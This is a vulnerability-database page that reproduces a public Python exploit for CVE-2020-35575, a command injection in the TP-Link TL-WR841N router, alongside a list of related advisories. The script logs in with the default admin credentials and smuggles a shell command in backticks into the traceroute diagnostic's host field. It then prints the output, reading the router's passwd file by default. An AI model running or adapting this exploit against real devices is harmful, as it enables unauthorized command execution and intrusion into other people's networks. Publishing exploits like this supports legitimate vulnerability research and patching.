Lucene search
+L

TP-Link TL-WR841N Command Injection

🗓️ 24 Jun 2021 00:00:00Reported by Koh You LiangType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 952 Views

TP-Link TL-WR841N Command Injection, CVE-2020-35575, Exploi

Related
Code
ReporterTitlePublishedViews
Family
0day.today
TP-Link TL-WR841N - Command Injection Exploit
25 Jun 202100:00
zdt
Circl
CVE-2020-35575
26 Dec 202007:26
circl
CNNVD
Multiple Tp-Link Router Products Information Disclosure Vulnerability
25 Dec 202000:00
cnnvd
Check Point Advisories
TP-Link Multiple Products Remote Code Execution (CVE-2020-35575)
29 Sep 202100:00
checkpoint_advisories
CVE
CVE-2020-35575
26 Dec 202002:02
cve
Cvelist
CVE-2020-35575
26 Dec 202002:02
cvelist
NVD
CVE-2020-35575
26 Dec 202002:15
nvd
OSV
CVE-2020-35575
26 Dec 202002:15
osv
Prion
Cross site scripting
26 Dec 202002:15
prion
RedhatCVE
CVE-2020-35575
22 May 202517:11
redhatcve
Rows per page
`# Exploit Title: TP-Link TL-WR841N - Command Injection  
# Date: 2020-12-13  
# Exploit Author: Koh You Liang  
# Vendor Homepage: https://www.tp-link.com/  
# Software Link: https://static.tp-link.com/TL-WR841N(JP)_V13_161028.zip  
# Version: TL-WR841N 0.9.1 4.0  
# Tested on: Windows 10  
# CVE : CVE-2020-35575  
  
import requests  
import sys  
import time  
  
try:  
_ = sys.argv[2]  
payload = ' '.join(sys.argv[1:])  
except IndexError:  
try:  
payload = sys.argv[1]  
except IndexError:  
print("[*] Command not specified, using the default `cat etc/passwd=`")  
payload = 'cat etc/passwd'  
  
# Default credentials is admin:admin - replace with your own  
cookies = {  
'Authorization': 'Basic YWRtaW46YWRtaW4='  
}  
  
headers = {  
'Host': '192.168.0.1',  
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko=/20100101 Firefox/84.0',  
'Accept': '*/*',  
'Accept-Language': 'en-US,en;q=0.5',  
'Accept-Encoding': 'gzip, deflate',  
'Content-Type': 'text/plain',  
'Content-Length': '197',  
'Origin': 'http://192.168.0.1',  
'Connection': 'close',  
'Referer': 'http://192.168.0.1/mainFrame.htm',  
}  
  
data1 = \  
'''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\r\nmaxHopCount=20\r\ntimeout=50\r\nnumberOfTries=1\r\nhost="`{}`"\r\ndataBlockSize=64\r\nX_TP_ConnName=ewan_ipoe_d\r\ndiagnosticsState=Requested\r\nX_TP_HopSeq=0\r\n'''.format(payload)  
response1 = requests.post('http://192.168.0.1/cgi?2', headers=headers, cookies=cookies, data=data1, verify=False)  
print('[+] Sending payload...')  
  
try:  
response1.text.splitlines()[0]  
except IndexError:  
sys.exit('[-] Cannot get response. Please check your cookie.')  
if response1.text.splitlines()[0] != '[error]0':  
sys.exit('[*] Router/Firmware is not vulnerable.')  
  
data2 = '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n'  
response2 = requests.post('http://192.168.0.1/cgi?7', headers=headers, cookies=cookies, data=data2, verify=False)  
print('[+] Receiving response from router...')  
time.sleep(0.8) # Buffer time for traceroute to succeed  
  
data3 = '''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3\r\ndiagnosticsState\r\nX_TP_HopSeq\r\nX_TP_Result\r\n'''  
response3 = requests.post('http://192.168.0.1/cgi?1', headers=headers, cookies=cookies, data=data3, verify=False)  
  
if '=:' in response3.text.splitlines()[3]:  
print('[-] Command not supported.')  
else:  
print('[+] Exploit successful!')  
for line_number, line in enumerate(response3.text.splitlines()):  
try:  
if line_number == 3:  
print(line[12:])  
if line_number > 3 and line != '[error]0':  
print(line)  
if 'not known' in line:  
break  
except IndexError:  
break  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation